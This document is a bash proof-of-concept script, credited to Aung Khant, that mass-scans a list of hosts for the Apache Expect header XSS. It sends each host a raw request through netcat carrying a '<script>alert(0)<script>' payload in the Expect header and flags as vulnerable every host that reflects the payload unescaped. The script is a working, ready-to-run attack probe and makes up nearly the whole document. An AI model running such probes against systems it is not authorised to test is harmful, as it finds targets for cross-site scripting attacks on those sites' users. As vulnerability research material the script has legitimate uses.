Apache EXPECT Header XSS POC

A proof of concept for the Apache EXPECT header XSS: it reads a list of host/port pairs and reports which hosts echo the supplied Expect header back unescaped.

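#!/usr/bin/env bash
#
# Check Apache EXPECT Header XSS against a list of hosts running a web server.
# Takes as argument 1 a file containing a list of hosts (one per line, in the
# format: hostname/IP PORT) and writes the host(s) found to reflect the marker
# to <hosts_file>-apache-expect-xssed.
#
#  ./xss_apache_expect.sh hosts_file
#
#  sample content of hosts_file (line by line)
#
#  yehg.org 80
#  127.0.0.1 80
#
# The check sends one request whose Expect: header carries an inert marker
# string and reports a host only when that exact marker is echoed back in the
# response, i.e. the server reflects the header value unescaped.
#
# Requires: nc (netcat), tput (for the coloured result lines).

set -u

# Marker placed in the Expect: header and searched for in the reply. It is
# matched as a fixed string (grep -F), so no regex metacharacters apply.
readonly MARKER='<script>alert(0)<script>'
# Seconds nc waits on a host before giving up.
readonly NC_TIMEOUT=4

#######################################
# Print a diagnostic to stderr and exit.
# Arguments: message words
#######################################
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

#######################################
# Print the banner to stdout.
#######################################
banner() {
  printf '%s\n' '++++++++++++++++++++++++++++++++++++'
  printf '%s\n' 'Apache EXPECT Header XSS POC'
  printf '%s\n' 'by Aung Khant, aungkhant[at]yehg.net, http://yehg.net'
  printf '%s\n' '++++++++++++++++++++++++++++++++++++'
  printf '\n'
}

#######################################
# Send one request with the marker in the Expect: header.
# Globals:   MARKER, NC_TIMEOUT (read)
# Arguments: $1 - host, $2 - port
# Returns:   0 when the marker is reflected in the response, 1 otherwise
#            (a connection failure or timeout counts as "not reflected")
#######################################
probe_host() {
  local host=$1 port=$2
  # Host: carries only the host name; the original sent the whole "host port"
  # line, which is not a valid Host value. Every header line ends in CRLF
  # (the original mixed a bare \n after the request line with \r\n elsewhere).
  # Content-length is sent twice, exactly as in the original request.
  printf 'GET / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nExpect: %s\r\nContent-length: 0\r\nContent-length: 0\r\n\r\n' \
    "$host" "$MARKER" \
    | nc -w "$NC_TIMEOUT" "$host" "$port" \
    | grep -qiF -- "$MARKER"
}

#######################################
# Print one result line, red when the marker was reflected, green otherwise.
# Arguments: $1 - host, $2 - port, $3 - 1 when reflected, 0 otherwise
# Outputs:   one line on stdout
#######################################
report() {
  local host=$1 port=$2 reflected=$3
  local red green reset
  # tput fails when TERM is unset (e.g. output piped to a file); then the
  # colour sequences are simply empty, which is the desired behaviour.
  red=$(tput setaf 1 2>/dev/null) || red=
  green=$(tput setaf 2 2>/dev/null) || green=
  reset=$(tput sgr0 2>/dev/null) || reset=
  if (( reflected )); then
    printf '[!] %s on port %s ... %sVULNERABLE!%s\n' "$host" "$port" "$red" "$reset"
  else
    printf '[+] %s on port %s ... %sOK%s\n' "$host" "$port" "$green" "$reset"
  fi
}

#######################################
# Read the hosts file and probe every "host port" pair in it.
# Arguments: $1 - hosts file (one "host port" pair per line)
# Outputs:   one result line per host on stdout; reflecting hosts are also
#            appended, as their original line, to <hosts_file>-apache-expect-xssed
# Returns:   exits 2 on bad usage, 1 when prerequisites are missing
#######################################
main() {
  banner
  if (( $# != 1 )); then
    # The original printed "./$0" and a stray ">>" here.
    printf 'Usage: %s <hosts_file>\n' "$0" >&2
    exit 2
  fi
  local hosts_file=$1
  # The original appended to "$hostfile-apache-expect-xssed" with $hostfile
  # never set, so results landed in a file literally named
  # "-apache-expect-xssed". Derive the output name from the argument instead.
  local out_file="${hosts_file}-apache-expect-xssed"

  [[ -r "$hosts_file" ]] || die "cannot read hosts file: $hosts_file"
  command -v nc >/dev/null || die "nc (netcat) is required but not found"

  local line host port
  # Read line by line without word-splitting the whole file (the original set
  # IFS globally and looped over `cat`); also handle a missing final newline.
  while IFS= read -r line || [[ -n "$line" ]]; do
    read -r host port _ <<<"$line"
    # Skip blank lines and anything that is not "host port" with a numeric
    # port, or whose host looks like an option, instead of handing it to nc.
    if [[ -z "$host" || -z "$port" || "$host" == -* || ! "$port" =~ ^[0-9]+$ ]]; then
      [[ -n "$line" ]] && printf 'skipping malformed line: %s\n' "$line" >&2
      continue
    fi
    if probe_host "$host" "$port"; then
      report "$host" "$port" 1
      printf '%s\n' "$line" >> "$out_file"
    else
      report "$host" "$port" 0
    fi
  done < "$hosts_file"

  printf '\n'
}

main "$@"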


Submitted by Aung Khant
